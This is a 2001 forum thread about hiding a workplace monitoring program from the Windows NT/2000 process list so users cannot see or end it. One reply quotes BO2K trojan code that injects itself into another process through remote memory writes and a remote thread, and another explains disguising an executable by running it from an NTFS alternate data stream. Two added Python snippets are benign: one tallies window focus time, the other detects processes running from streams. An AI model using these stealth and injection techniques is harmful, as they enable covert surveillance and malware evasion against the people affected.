Hide App In Process List in NT / w2k?

  • Michael Mattias
    replied
    > .. it keeps the user (who is being monitored) from using the Windows Task Manager to end-task the program that is doing the monitoring. In fact it makes it so that the program can't be easily detected by the user in the first place.

    OK, now I understand. The "time" considerations are indirect. The real challenge is preventing unauthorized task termination!

    I knew there had to be some kind of reason.

    MCM



  • Gregery D Engle
    replied
    Thanks Eric!

    ------------------
    -Greg



  • Eric Pearson
    replied
    > What does hiding a process from the task list
    > have to do with logging the time spent using
    > that process?

    Nothing, at least not directly. But it keeps the user (who is being monitored) from using the Windows Task Manager to end-task the program that is doing the monitoring. In fact it makes it so that the program can't be easily detected by the user in the first place.

    -- Eric


    ------------------
    Perfect Sync Development Tools
    Perfect Sync Web Site
    Contact Us: [email protected]



  • Michael Mattias
    replied
    > I seem confused. How does trapping WM_SETFOCUS and WM_KILLFOCUS
    > on my app track usage on all apps on user's workstation?

    Well, you've confused me. You said,

    > well my app is for Management auditing, they want to see how much
    > time each window is active for a given user...

    There's a difference between how much time one spends in a window (which I interpreted as "time spent in any given window of a given application") and how much time users spend in any given application of a suite of different applications.

    To answer your question, trapping messages in any one application does nothing for logging time across multiple applications.

    FWIW, there's probably some "hook process" method to trap messages across applications, though.

    But I digress ... or do I? What does hiding a process from the task list have to do with logging the time spent using that process?

    MCM



  • Gregery D Engle
    replied
    Michael,

    I seem confused. How does trapping WM_SETFOCUS and WM_KILLFOCUS
    on my app track usage on all apps on the user's workstation?

    Getting the time is the easy part, I just need help hiding
    the app from the process list in NT.

    ------------------
    -Greg

    [This message has been edited by Gregery D Engle (edited October 15, 2001).]



  • Michael Mattias
    replied
    > well my app is for Management auditing, they want to see how much
    > time each window is active for a given user. They don't want
    > the user trying to end the task though.

    How does keeping a process off the task list aid this?

    Besides, you can track how much time a user spends in each Window easily enough by trapping the WM_SETFOCUS and WM_KILLFOCUS messages.

    MCM


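    An added illustration of Michael's suggestion, not code from anyone in this thread: once a program has captured the WM_SETFOCUS / WM_KILLFOCUS messages for its windows, turning them into per-window active time is a small bookkeeping job. The event stream below is constructed; real code would key on window handles rather than titles, and the `end_time` argument stands in for the moment the log is read.

```python
"""Per-window active time from a WM_SETFOCUS / WM_KILLFOCUS event stream.

Added example; assumes the monitoring program has already captured
(timestamp, message, window) tuples for its own windows.
"""
from collections import defaultdict

WM_SETFOCUS = 0x0007   # Windows message constants (values as defined by Win32)
WM_KILLFOCUS = 0x0008

# Constructed sample: (seconds since start, message, window title).
SAMPLE_EVENTS = [
    (0,  WM_SETFOCUS,  "Notepad"),
    (30, WM_KILLFOCUS, "Notepad"),
    (30, WM_SETFOCUS,  "Excel"),
    (45, WM_KILLFOCUS, "Excel"),
    (50, WM_KILLFOCUS, "Word"),    # kill-focus with no matching set-focus: dropped
    (60, WM_SETFOCUS,  "Notepad"),
    (70, WM_SETFOCUS,  "Excel"),   # set-focus while Notepad still open: Notepad closed implicitly
    # Excel never gets WM_KILLFOCUS: its interval is closed at end_time
]


def active_time(events, end_time):
    """Return {window: active_seconds} for a WM_SETFOCUS/WM_KILLFOCUS stream."""
    totals = defaultdict(int)
    current = None  # (window, start_time) of the window that currently has focus

    def close(t):
        nonlocal current
        if current is not None:
            win, start = current
            totals[win] += t - start
            current = None

    # Stable sort keeps kill-before-set ordering for events at the same timestamp.
    for t, msg, win in sorted(events, key=lambda e: e[0]):
        if msg == WM_SETFOCUS:
            close(t)            # only one window holds focus at a time
            current = (win, t)
        elif msg == WM_KILLFOCUS:
            if current is not None and current[0] == win:
                close(t)
            # a WM_KILLFOCUS for a window that never took focus is ignored
    close(end_time)             # a window still focused when the log is read
    return dict(totals)


if __name__ == "__main__":
    for win, secs in active_time(SAMPLE_EVENTS, end_time=100).items():
        print(f"{win}: {secs}s active")
```

    The point of the implicit close on WM_SETFOCUS is that focus messages from a live system do not always arrive in neat pairs; counting only closed pairs would silently lose time.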


  • Gregery D Engle
    replied
    well my app is for Management auditing, they want to see how much
    time each window is active for a given user. They don't want
    the user trying to end the task though.

    ------------------
    -Greg



  • Michael Mattias
    replied
    I just gotta ask:

    Why hide the process from the task list at all?

    In fact, why even hide the process from the task bar?

    My view: If it's a process, let it behave like a process, for crying out loud.

    If you don't want to spawn a second process, put it in a separate thread of execution!

    (I'm sure someone will give me a reasonable explanation of this penchant for hiding things).

    MCM




  • Wayne Diamond
    replied
    I know just enough C++ to install Visual Studio; sorry I can't help more with that.

    ------------------



  • Gregery D Engle
    replied
    Sven,

    Any help in converting to PB? Haven't programmed in C++ since
    high school.

    ------------------
    -Greg



  • Wayne Diamond
    replied
    But... but... it's C++


    [This message has been edited by Wayne Diamond (edited October 15, 2001).]



  • Sven Blumenstein
    replied
    From www.sourceforge.net/projects/bo2k
    Code:
    if(g_bIsWinNT) {  //---------------------- WINDOWS NT PROCESS HIDE -------------------
    		// -------------------------------------------------------
    		// -- Process Hiding Code                               
    		// -- Note that there are several different ways to do  
    		// -- what this code does. Both of the methods presented
    		// -- below were written specifically to avoid accessing
    		// -- the original BO2K image on disk.
    		// -- This way, the original BO2K disk file can be compressed
    		// -- with all of the plugin attachments inside, and
    		// -- the original executable can be moved around/deleted
    		// -- while the BO2K server still runs.
    		
    		// Get another process and thread id
    		PROCESSINFO *ppie,*ppi=CreateProcListSnapshot(NULL);
    		DWORD dwThreadID, dwProcID;
    		
    		for(ppie=ppi;ppie!=NULL;ppie=ppie->next) {
    			if(lstrcmpi(ppie->svApp,svProcess)==0) break;
    		}
    		if(ppie==NULL) return FALSE;
    		
    		dwProcID=ppie->dwProcID;
    		dwThreadID=ppie->pThread->dwThreadID; // Get first thread (doesn't really matter)
    		
    		DestroyProcListSnapshot(ppi);
    		
    		// Make sure we aren't hopping into ourselves
    		if(GetCurrentProcessId()==dwProcID) return FALSE;
    
    		// Open process to inject code into
    		HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcID);
    		if(hProc==NULL) {
    			DebugMessageBox(NULL,"Unable to open process","ERROR",MB_SETFOREGROUND);
    			return FALSE;
    		}
    		
    		// Free space for BO2K (in case we are restarting)
    		pVirtualFreeEx(hProc,g_module,0,MEM_RELEASE);
    		
    		// Allocate space for BO2K to fit in the process
    		DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(g_module))->SizeOfImage;
    		char *pMem=(char *)pVirtualAllocEx(hProc,g_module,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
    		if(pMem==NULL) {
    			DebugMessageBox(NULL,"Couldn't VirtualAllocEx","Error",MB_SETFOREGROUND);
    			return FALSE;
    		}
    		
    		// Lets copy the entire bo2k process into this space.
    		DWORD dwOldProt,dwNumBytes,i;
    		MEMORY_BASIC_INFORMATION mbi;
    		
    		pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
    		while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) {
    			if(!(mbi.Protect & PAGE_GUARD)) {
    				for(i=0;i<mbi.RegionSize;i+=0x1000) {
    					pVirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt);
    					WriteProcessMemory(hProc,pMem+i,pMem+i,0x1000,&dwNumBytes);
    				}
    			}
    			
    			pMem+=mbi.RegionSize;
    			pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));	
    		}
    		
    		// Create a remote thread in the other process
    		DWORD dwRmtThdID;
    		HANDLE hRmtThd=pCreateRemoteThread(hProc,NULL,0,EntryPoint,(LPVOID)g_module,0,&dwRmtThdID);
    		if(hRmtThd==NULL) {
    			DebugMessageBox(NULL,"Could create remote thread","ERROR",MB_SETFOREGROUND);
    			return FALSE;
    		}
    		
    		CloseHandle(hProc);
    		return 0;
    ------------------
    Sven Blumenstein
    IT-Trainee at DECOMA Exterior Systems, Germany
    E-Mail: [email protected][NOSPAM]cycos.net
    Programming with: PB/DLL, MASM, VB, VC++, LCC, VBA, WML



  • Wayne Diamond
    replied
    You can use RegisterServiceProcess to hide it from the Task List, but you can't hide from the Process List as such - at least, not if you're a running process.
    But have a look through Semen's posts; he's written a couple of amazing DLLs that inject into already-running processes. You could also make a DLL that is loaded by a system process, but that may also be tricky. Another option is to make a base service provider - e.g. DLLs registered with Regsvr32.exe; they're always running but never show in the process list.
    In Win98 you can 'patch' the Toolhelp APIs to render your process hidden, but it can't be applied to NT/2K.
    One thing you can do, however, is to run your program from a stream. For example, copy it across to c:\winnt\calc.exe:mystream
    You've got two files in one - calc.exe (MS Calc), and calc.exe:mystream (your prog). You can't use Start | Run to execute streams, but you can do it programmatically using a call to ShellExecute().
    Then look at your process list - you'll just see "calc.exe" but you won't see "calc.exe:mystream", even though that's what is actually running. This is only a visual deception though, as the process list APIs still reveal the full path; it's just that Task Manager for some reason chooses to ignore the stream segment of the filename.

    Best of luck!
    Wayne


    ------------------

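    An added example from the auditing side, not code posted by anyone here: Wayne points out that the process-list APIs still report the full image path including the ":stream" part, and only Task Manager drops it. So whoever reviews the process list can parse the reported paths and flag any image that lives in a named alternate data stream. The path list below is constructed to stand in for what a process-enumeration API would return; the extended-length "\\?\" prefix, the ":$DATA" type suffix and UNC paths are handled so that the default (unnamed) stream is not mistaken for a hidden one.

```python
"""Flag process image paths that point into an NTFS alternate data stream.

Added example; the input is a constructed list of image paths as a
process-enumeration API might report them.
"""
import re

SAMPLE_PATHS = [
    r"C:\winnt\system32\svchost.exe",
    r"C:\winnt\calc.exe:mystream",        # executable running from a named stream
    r"C:\winnt\calc.exe:mystream:$DATA",  # same, with the explicit stream type
    r"C:\winnt\notepad.exe::$DATA",       # unnamed default stream: the file itself
    r"\\?\C:\Tools\viewer.exe:payload",   # extended-length prefix, named stream
    r"\\fileserver\share\app.exe",        # UNC path, no drive colon at all
]

# Optional extended-length prefix followed by a drive letter and its colon.
_DRIVE = re.compile(r"^(\\\\\?\\)?[A-Za-z]:")


def split_stream(path):
    """Return (file_path, stream_name) for a Windows path.

    stream_name is "" when the path names the file's default data stream,
    so only a non-empty result means the image is in a named stream.
    """
    m = _DRIVE.match(path)
    head = path[:m.end()] if m else ""       # drive (and prefix) with its colon
    rest = path[len(head):]
    parts = rest.split(":")                  # any remaining colon starts a stream spec
    file_part, stream_parts = parts[0], parts[1:]
    # Drop an explicit ":$DATA" stream-type suffix if present.
    if stream_parts and stream_parts[-1].upper() == "$DATA":
        stream_parts = stream_parts[:-1]
    stream = ":".join(stream_parts)          # "" for the default stream
    return head + file_part, stream


def find_ads_images(paths):
    """Return [(reported_path, file_path, stream_name)] for images in a named stream."""
    hits = []
    for p in paths:
        file_path, stream = split_stream(p)
        if stream:
            hits.append((p, file_path, stream))
    return hits


if __name__ == "__main__":
    for reported, host_file, stream in find_ads_images(SAMPLE_PATHS):
        print(f"{reported}: runs from stream '{stream}' of {host_file}")
```

    The same split is worth applying to whatever the monitoring tool logs, since a display layer that truncates at the colon is exactly the deception Wayne describes.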


  • Gregery D Engle
    started a topic Hide App In Process List in NT / w2k?

    Hide App In Process List in NT / w2k?

    Anyone know how? I don't want the process to show at all.

    ------------------
    -Greg